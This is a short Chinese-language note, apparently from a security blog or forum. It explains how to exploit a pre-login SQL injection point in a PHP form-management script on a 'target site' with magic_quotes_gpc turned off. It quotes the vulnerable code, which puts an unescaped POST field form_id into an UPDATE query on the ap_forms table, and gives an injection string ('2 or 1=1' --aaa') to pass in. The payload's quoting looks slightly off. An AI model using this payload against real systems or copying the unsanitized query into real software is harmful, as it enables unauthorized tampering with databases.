目标站的magic_quotes_gpc = OFF,预登录POST的update的注入点,根据代码构造UPDATE的SELECT注入语句:
$form_id = trim($_POST['form_id']);
$operation = trim($_POST['operation']);
if(!empty($form_id)){
connect_db();
if($operation == 'enable'){ //activate this form
$query = "update `ap_forms` set form_active=1 where form_id='$form_id'";
}elseif ($operation == 'disable'){ //disable this form
$query = "update `ap_forms` set form_active=0 where form_id='$form_id'";
}
do_query($query);
}
echo $form_id;
比如你要UPDATE的id=2,传入SQL字符 : "2 or 1=1' --aaa"